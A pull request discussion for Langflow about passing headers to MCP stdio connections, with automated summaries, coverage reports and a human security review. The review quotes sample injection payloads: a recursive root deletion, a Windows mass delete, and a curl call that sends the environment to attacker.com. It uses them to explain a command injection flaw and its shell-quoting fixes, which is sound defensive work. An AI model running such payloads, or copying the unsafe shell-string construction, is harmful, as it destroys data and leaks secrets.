fix: correctly pass headers in mcp stdio connections

[jordanrfrazier]

Correctly passes all custom headers to MCP stdio connections.

Example request in logs:

[I 2026-02-11 15:11:10,772.772 mcp_proxy.httpx_client] Request Headers: {'host': 'localhost:7860', 'accept-encoding': 'gzip, deflate', 'connection': 'keep-alive', 'user-agent': 'python-httpx/0.28.1', 'header1': 'value1', 'header2': 'value', 'x-api-key': '***MASKED***', 'accept': 'application/json, text/event-stream', 'content-type': 'application/json', 'mcp-protocol-version': '2025-11-25', 'content-length': '46'}

Summary by CodeRabbit

Release Notes

• New Features

  • Added input validation component with LLM-based guardrails for detecting harmful content.
  • Introduced SSO configuration support with configurable providers.
  • Enhanced prompt editor with double-bracket (mustache) syntax support and unique variable naming.
  • Added file removal capability to upload inputs.

• Improvements

  • Centralized authentication service for streamlined credential handling.
  • Enhanced session renaming with message detection.
  • Improved MCP server configuration with header injection support.
  • Better connected input detection in the inspection panel.

• Tests

  • Added comprehensive authentication service test coverage.
  • Introduced guardrails component validation tests.
  • Expanded frontend E2E test suite.

[coderabbitai]

Important

Review skipped

Auto reviews are disabled on base/target branches other than the default branch.

Please check the settings in the CodeRabbit UI or the .coderabbit.yaml file in this repository. To trigger a single review, invoke the @coderabbitai review command.

You can disable this status message by setting the reviews.review_status to false in the CodeRabbit configuration file.

Use the checkbox below for a quick retry:

• 🔍 Trigger review

Walkthrough

This PR implements a pluggable authentication service architecture, refactoring authentication from scattered utility functions to a centralized BaseAuthService pattern. It introduces framework-agnostic auth exceptions, updates API endpoints and services to delegate through an auth service, simplifies encryption/decryption by removing settings service dependencies, and adds a new GuardrailsComponent for input validation. Frontend changes enhance session management and prompt handling.

Changes

Cohort / File(s)	Summary
Auth Service Core Infrastructure src/lfx/src/lfx/services/auth/base.py, src/lfx/src/lfx/services/auth/service.py, src/lfx/src/lfx/services/auth/exceptions.py, src/lfx/src/lfx/services/auth/constants.py, src/lfx/src/lfx/services/auth/factory.py, src/lfx/src/lfx/services/auth/__init__.py	Introduces framework-agnostic auth architecture with abstract BaseAuthService, concrete AuthService, exception hierarchy (AuthenticationError, InvalidCredentialsError, etc.), constants, and factory registration. Typed signatures and comprehensive auth interface contracts.
Backend Auth Service Integration src/backend/base/langflow/services/auth/base.py, src/backend/base/langflow/services/auth/service.py, src/backend/base/langflow/services/auth/utils.py, src/backend/base/langflow/services/auth/factory.py, src/backend/base/langflow/services/auth/constants.py, src/backend/base/langflow/services/auth/exceptions.py, src/backend/base/langflow/services/auth/mcp_encryption.py	Langflow-specific auth service implementation with token/API-key authentication, user validation, webhook support, encryption/decryption, and MCP handlers. Utils delegation pattern replaces in-file implementations.
API Endpoint Auth Refactoring src/backend/base/langflow/api/v1/login.py, src/backend/base/langflow/api/v1/api_key.py, src/backend/base/langflow/api/v1/endpoints.py, src/backend/base/langflow/api/v1/users.py, src/backend/base/langflow/api/v2/mcp.py	Updates endpoints to use get_auth_service() for authentication and password operations instead of direct imports. Adds MCPServerConfig schema for request body validation.
Auth Service Dependencies & Wiring src/backend/base/langflow/services/deps.py, src/backend/base/langflow/__main__.py, src/backend/base/langflow/initial_setup/setup.py, src/backend/base/langflow/services/utils.py, src/backend/base/langflow/services/factory.py	Adds get_auth_service() dependency getter, updates CLI/startup to use auth service for superuser creation, registers auth service in service manager, and wires service overrides.
Encryption & Key Handling Simplification src/backend/base/langflow/api/v1/store.py, src/backend/base/langflow/services/variable/service.py, src/backend/base/langflow/services/variable/kubernetes.py	Removes settings_service parameter from encrypt_api_key/decrypt_api_key calls. Adds validation to prevent Fernet-encrypted values in GENERIC_TYPE variables.
Password & Flow Services src/backend/base/langflow/services/flow/flow_runner.py, src/backend/base/langflow/services/utils.py	Replaces direct get_password_hash and verify_password calls with auth service delegation.
LFX Services Framework src/lfx/src/lfx/services/auth/*, src/lfx/src/lfx/services/interfaces.py, src/lfx/src/lfx/services/schema.py, src/lfx/src/lfx/services/deps.py, src/lfx/src/lfx/services/manager.py	Framework-agnostic auth service base, exceptions, protocols, schema additions (AuthServiceProtocol, AUTH_SERVICE), and circular dependency guard in service manager.
Settings & Configuration src/lfx/src/lfx/services/settings/auth.py, pyproject.toml, .gitignore, src/lfx/PLUGGABLE_SERVICES.md	Adds SSO configuration flags (SSO_ENABLED, SSO_PROVIDER, SSO_CONFIG_FILE), Ruff linting rules for auth service, gitignore entry, and pluggable services documentation.
New GuardrailValidator Component src/lfx/src/lfx/components/llm_operations/guardrails.py, src/lfx/src/lfx/_assets/component_index.json, src/lfx/src/lfx/_assets/stable_hash_history.json	Introduces GuardrailsComponent for LLM-based input validation (PII, jailbreak, tokens, custom guardrails) with heuristic scoring and caching. Updates component registry.
MCP Utilities & Tools src/lfx/src/lfx/base/mcp/util.py	Adds header injection logic for MCP Stdio command arguments, handling insertion before existing --headers flags or before URL positional arg.
Frontend Auth Tests src/backend/tests/unit/api/v1/test_flows.py, src/backend/tests/unit/test_login.py, src/backend/tests/unit/test_cli.py, src/backend/tests/unit/test_webhook.py, src/backend/tests/unit/test_setup_superuser.py, src/backend/tests/unit/test_auth_jwt_algorithms.py, src/backend/tests/unit/test_security_cors.py	Updates auth tests to patch/use new get_auth_service() path, replaces settings service mocks with real AuthService instances, adds malformed token test.
Auth Service Unit Tests src/backend/tests/unit/services/auth/test_auth_service.py, src/backend/tests/unit/services/auth/test_decrypt_api_key.py, src/backend/tests/unit/services/auth/test_mcp_encryption.py, src/backend/tests/unit/services/auth/test_pluggable_auth.py	New comprehensive auth service tests covering token flows, encryption, API key security, pluggable auth backends, and error scenarios.
Component & Variable Tests src/backend/tests/unit/components/llm_operations/test_guardrails_component.py, src/backend/tests/unit/services/variable/test_service.py, src/backend/tests/unit/base/mcp/test_mcp_util.py	Adds extensive guardrails component test suite, variable encryption validation test, and MCP header injection tests.
General Tests src/backend/tests/conftest.py, src/backend/tests/unit/api/v1/test_variable.py	Updates conftest to use get_auth_service() for password hashing; changes variable test error injection from ORM session to service layer.
Frontend Session & Playground UI src/frontend/src/components/core/playgroundComponent/chat-view/chat-header/components/chat-header.tsx, src/frontend/src/components/core/playgroundComponent/chat-view/chat-header/components/chat-sidebar.tsx, src/frontend/src/components/core/playgroundComponent/chat-view/chat-header/components/session-selector.tsx, src/frontend/src/components/core/playgroundComponent/chat-view/chat-header/components/session-more-menu.tsx, src/frontend/src/components/core/playgroundComponent/chat-view/chat-header/hooks/use-session-has-messages.ts	Adds useSessionHasMessages hook, menu state control (menuOpen, onMenuOpenChange), and conditional rename visibility based on session message presence.
Frontend Prompt & Input Components src/frontend/src/components/core/parameterRenderComponent/components/accordionPromptComponent/index.tsx, src/frontend/src/components/core/parameterRenderComponent/components/accordionPromptComponent/index.test.tsx, src/frontend/src/components/core/parameterRenderComponent/index.tsx, src/frontend/src/components/core/parameterRenderComponent/types.ts	Adds mustache-style double-bracket prompt handling (isDoubleBrackets prop), generateUniqueVariableName utility, and conditional modal rendering based on bracket style.
Frontend File Upload & Layout src/frontend/src/components/core/parameterRenderComponent/components/inputFileComponent/index.tsx, src/frontend/src/components/core/playgroundComponent/chat-view/chat-input/components/no-input.tsx, src/frontend/src/components/core/playgroundComponent/chat-view/chat-input/components/text-area-wrapper.tsx, src/frontend/src/components/core/playgroundComponent/chat-view/chat-messages/messages.tsx, src/frontend/src/components/core/playgroundComponent/sliding-container/components/flow-page-sliding-container.tsx, src/frontend/src/components/ui/textarea.tsx	Adds file clear/dismiss action, text-area ResizeObserver-driven resize, removes large-screen padding, adds conditional fullscreen layout wrapping, and updates textarea styling.
Frontend Inspection & State Management src/frontend/src/pages/FlowPage/components/InspectionPanel/components/InspectionPanelEditField.tsx, src/frontend/src/pages/FlowPage/components/InspectionPanel/__tests__/InspectionPanelEditField.test.tsx, src/frontend/src/modals/IOModal/components/IOFieldView/components/session-selector.tsx, src/frontend/src/modals/IOModal/components/sidebar-open-view.tsx, src/frontend/src/stores/flowStore.ts, src/frontend/src/stores/helpers/filter-singleton-component.ts, src/frontend/src/stores/__tests__/filter-singleton-component.test.ts	Adds flow store connection checks to disable/warn on connected field edits, singleton component filtering for ChatInput/Webhook, session menu state tracking, and comprehensive filter tests.
Frontend Utilities src/frontend/src/utils/reactflowUtils.ts	Extends cleanEdges to include isAdvanced target field check alongside tool_mode condition.
Frontend E2E & Regression Tests src/frontend/tests/core/unit/promptModalComponent.spec.ts, src/frontend/tests/extended/regression/general-bugs-hidden-input-edges.spec.ts, src/frontend/tests/extended/regression/general-bugs-move-flow-from-folder.spec.ts, src/frontend/tests/extended/regression/general-bugs-shard-3836.spec.ts	Adds mustache prompt modal sync test, inspection panel hidden-edge regression test, flow-rename timing waits, and file removal/re-upload verification.
Service Registration & Factory Tests src/lfx/tests/unit/services/test_decorator_registration.py, src/lfx/tests/unit/services/test_edge_cases.py	Adds MockSessionService for service registration tests, updates clean_manager fixture, and verifies multiple decorator handling and plugin discovery.
Starter Project Data src/backend/base/langflow/initial_setup/starter_projects/Youtube Analysis.json	Adds new edge connecting BatchRunComponent to parser component for data flow.
Auth Release Tag Handling scripts/ci/langflow_pre_release_tag.py	Updates RC version regex to accept optional dot before "rc" per PEP 440 and simplifies rc-number incrementation logic.
.secrets.baseline .secrets.baseline	Updates line number reference for test_setup_superuser.py line number shift from 56 to 60.

Estimated code review effort

🎯 5 (Critical) | ⏱️ ~120 minutes

Possibly related PRs

• Implements the pluggable BaseAuthService and AuthService framework-agnostic architecture with comprehensive refactoring across backend APIs and services to delegate through centralized auth service.
• Adds the GuardrailsComponent for LLM-based input validation with jailbreak detection, PII checking, and custom guardrail support.
• Extends auth settings with SSO configuration flags (SSO_ENABLED, SSO_PROVIDER, SSO_CONFIG_FILE) and updates the pluggable services documentation.

Suggested labels

authentication, backend-refactoring, frontend-ui, component-addition, services-architecture

Suggested reviewers

• viktoravelino
• deon-sanchez
• keval718

---

Important

Pre-merge checks failed

Please resolve all errors before merging. Addressing warnings is optional.

❌ Failed checks (1 error, 3 warnings)

Check name	Status	Explanation	Resolution
Test Coverage For New Implementations	❌ Error	PR lacks dedicated test files for LFX AuthService, BaseAuthService, and use-session-has-messages hook; critical bugs and security issues in review comments suggest inadequate edge case and error handling coverage.	Create test files for untested auth services and React hook; add comprehensive tests for flagged issues including exception handling, state management, abstract methods, token security, and transaction rollbacks.
Docstring Coverage	⚠️ Warning	Docstring coverage is 65.29% which is insufficient. The required threshold is 80.00%.	Write docstrings for the functions missing them to satisfy the coverage threshold.
Test Quality And Coverage	⚠️ Warning	Test suite has multiple critical issues: invalid @pytest.mark.anyio markers, MockSessionService missing super().init() calls, use-session-has-messages violates React Rules of Hooks, and insufficient coverage of initialization and error paths.	Replace @pytest.mark.anyio with @pytest.mark.asyncio, add super().init() to MockSessionService, move useQuery hook before early returns, add tests for _pre_run_setup() initialization, and add MCP header quoting and API error response tests.
Test File Naming And Structure	⚠️ Warning	Test file src/backend/tests/unit/services/auth/test_auth_service.py uses @pytest.mark.anyio (22 instances) instead of project-standard @pytest.mark.asyncio (574 instances elsewhere); pytest-anyio not in dependencies.	Replace all @pytest.mark.anyio decorators with @pytest.mark.asyncio in test_auth_service.py to match project standards, or remove markers if using asyncio_mode="auto".

✅ Passed checks (3 passed)

Check name	Status	Explanation
Description Check	✅ Passed	Check skipped - CodeRabbit’s high-level summary is enabled.
Title check	✅ Passed	The title 'fix: correctly pass headers in mcp stdio connections' directly and clearly summarizes the main change: fixing header passing in MCP stdio connections, which is a core functional change visible throughout the diff.
Excessive Mock Usage Warning	✅ Passed	PR demonstrates good mock usage with deliberate refactoring toward real service usage; new tests maintain reasonable mock-to-test ratio; no excessive mocking warnings in review.

✨ Finishing touches

🧪 Generate unit tests (beta)

• Create PR with unit tests
• Post copyable unit tests in a comment
• Commit unit tests in branch pass-headers-mcp-stdio-conns-v1.8

---

Thanks for using CodeRabbit! It's free for OSS, and your support helps us grow. If you like it, consider giving us a shout-out.

❤️ Share

• X
• Mastodon
• Reddit
• LinkedIn

_{Comment @coderabbitai help to get the list of available commands and usage tips.}

[Cristhianzl]

CRITICAL Issues

1. Command Injection via Header Values

Severity: CRITICAL / Security
Rule violated: REVIEWER_RULE > Security ("All user inputs are sanitized and validated at system boundaries"), DEVELOPMENT_RULE > Security ("Sanitize and validate all user and external inputs")

Header values are concatenated into a shell command string that is executed via bash -c (Unix) or cmd /c (Windows) in _connect_to_server (line 1059-1076). While validate_headers sanitizes for HTTP header injection (newlines, control chars), it does NOT sanitize for shell metacharacters.

A malicious header value like:

{"X-Custom": "val; rm -rf /"}
{"X-Custom": "val$(curl attacker.com/exfil?data=$(env))"}
{"X-Custom": "val & del /f /q C:\\*"}   # Windows

would result in arbitrary command execution because the full_command string is passed directly to a shell.

Fix required: Either:

• Use shlex.quote() (Unix) / proper escaping (Windows) on each argument before joining
• Or better: refactor to pass args as a list to StdioServerParameters directly, avoiding shell string construction entirely

2. Header Values with Spaces Are Broken

Severity: CRITICAL / Bug
Rule violated: DEVELOPMENT_RULE > Trade-offs > Correctness (#1 priority)

In _connect_to_server (line 1059), the command string is split back into args via command_str.split(" "):

command = command_str.split(" ")  # line 1059

This means a header value like Bearer token123 (which contains a space) becomes two separate tokens: Bearer and token123. The --headers key value triplet format expected by mcp-proxy is broken:

Expected:  --headers authorization "Bearer token123"
Actual:    --headers authorization Bearer token123
                                    ^^^^ ^^^^^^^^
                                    Two separate args instead of one value

On Windows, cmd /c reconstructs the string (line 1067) making this even more unpredictable.

The tests validate broken behavior - e.g., test_stdio_headers_injected_with_existing_headers_flag asserts:

assert "--headers authorization Bearer token123" in full_command

This is asserting that Bearer token123 appears as two separate words in the command, which is the bug itself.

Fix required: Quote or escape header values that contain spaces. Use shlex.quote() on Unix or equivalent for Windows.

3. Windows Compatibility: Unsafe Command Construction

Severity: CRITICAL / Cross-platform
Relevant context: Langflow runs on Windows

The " ".join([command, *args]) approach does not account for Windows-specific issues:

• Paths with spaces (very common on Windows, e.g., C:\Program Files\...) are broken by split(" ")
• Windows argument escaping uses " differently from Unix shells
• cmd /c quoting rules are notoriously complex and different from bash
• Shell metacharacters differ: &, |, ^, %VAR% are special in cmd.exe

The existing code (pre-PR) already had this architectural issue, but this PR amplifies it by injecting user-controlled data (headers) into the command string. The risk surface grows significantly.

Fix required: At minimum, ensure header values are properly escaped for both shells. Ideally, the architecture should pass args as a list rather than building a command string.

---

IMPORTANT Issues

4. No Validation of Header Values for Shell Safety

Severity: IMPORTANT
Rule violated: REVIEWER_RULE > Security ("External/untrusted data is never trusted without validation")

The _process_headers -> validate_headers pipeline only validates for HTTP safety (RFC 7230). There is no validation or escaping for shell safety. Since the header values end up in a shell command, a dedicated shell-escaping step is needed.

Suggestion: Add a helper that applies shlex.quote() to each individual arg token before building the command string, or better yet, avoid shell execution entirely.

5. Tests Assert Incorrect Behavior

Severity: IMPORTANT
Rule violated: DEVELOPMENT_RULE > Testing ("Tests should validate behavior, not implementation details")

Several tests validate the string representation of full_command rather than the actual parsed arguments that would reach the subprocess. Since the string is later split by spaces, the tests should verify the resulting argument list, not the joined string. This would have caught the spaces bug.

Example:

# Current (validates broken string)
assert "--headers authorization Bearer token123" in full_command

# Better (validates correct arg list)
# After refactor, verify args list directly
assert ["--headers", "authorization", "Bearer token123"] == args[idx:idx+3]

---

RECOMMENDED Improvements

6. Test Naming Convention

Severity: LOW
Rule violated: DEVELOPMENT_RULE > Testing ("Name tests clearly: should_[expected]when[condition]")

Test names like test_stdio_headers_injected_with_existing_headers_flag don't follow the should_[expected]_when_[condition] pattern. While this is minor and may follow existing project conventions, consider renaming for consistency:

# Current
async def test_stdio_headers_injected_with_existing_headers_flag

# Suggested
async def test_should_inject_headers_before_existing_when_headers_flag_present

7. Defensive Copy Is Good

The change from args = server_config.get("args", []) to args = list(...) is correct and prevents mutation of the original config. The corresponding test (test_stdio_does_not_mutate_original_config) is well written.

---

Summary Table

#	Issue	Severity	Category
1	Command injection via header values	CRITICAL	Security
2	Header values with spaces are broken	CRITICAL	Bug
3	Windows command construction is unsafe	CRITICAL	Cross-platform
4	No shell-safety validation for headers	IMPORTANT	Security
5	Tests assert incorrect behavior	IMPORTANT	Testing
6	Test naming convention	LOW	Style
7	Defensive copy (positive)	N/A	Good practice

---

Recommended Approach for Fixes

The root cause of issues 1-4 is the architectural pattern of building a command string that is later split by spaces and executed via shell. The cleanest fix would be:

1. Refactor _connect_to_server to accept an args list instead of a command string, avoiding the " ".join() -> split(" ") round-trip entirely
2. If refactoring is out of scope, at minimum apply shlex.quote() (Unix) and equivalent Windows escaping to each arg token that contains user-controlled data
3. Update tests to verify the actual argument list rather than the string representation
4. Add integration test with header values containing spaces, shell metacharacters, and Windows-problematic characters (&, |, %, ^)

[codecov]

Codecov Report

❌ Patch coverage is 0% with 16 lines in your changes missing coverage. Please review.
✅ Project coverage is 35.03%. Comparing base (0f37c96) to head (81b7369).
⚠️ Report is 7 commits behind head on release-v1.8.0.

Files with missing lines	Patch %	Lines
src/lfx/src/lfx/base/mcp/util.py	0.00%	16 Missing ⚠️

Additional details and impacted files

@@                Coverage Diff                 @@
##           release-v1.8.0   #11746      +/-   ##
==================================================
- Coverage           35.76%   35.03%   -0.74%     
==================================================
  Files                1522     1522              
  Lines               75146    73673    -1473     
  Branches            11305    11259      -46     
==================================================
- Hits                26876    25811    -1065     
+ Misses              46853    46449     -404     
+ Partials             1417     1413       -4     

Flag	Coverage Δ
backend	55.63% <ø> (-0.94%)	⬇️
lfx	42.08% <0.00%> (-0.33%)	⬇️

Flags with carried forward coverage won't be shown. Click here to find out more.

Files with missing lines	Coverage Δ
src/lfx/src/lfx/base/mcp/util.py	0.00% <0.00%> (ø)

... and 26 files with indirect coverage changes

🚀 New features to boost your workflow:

• ❄️ Test Analytics: Detect flaky tests, report on failures, and find test suite problems.
• 📦 JS Bundle Analysis: Save yourself from yourself by tracking and limiting bundle sizes in JS merges.

[Cristhianzl]

lgtm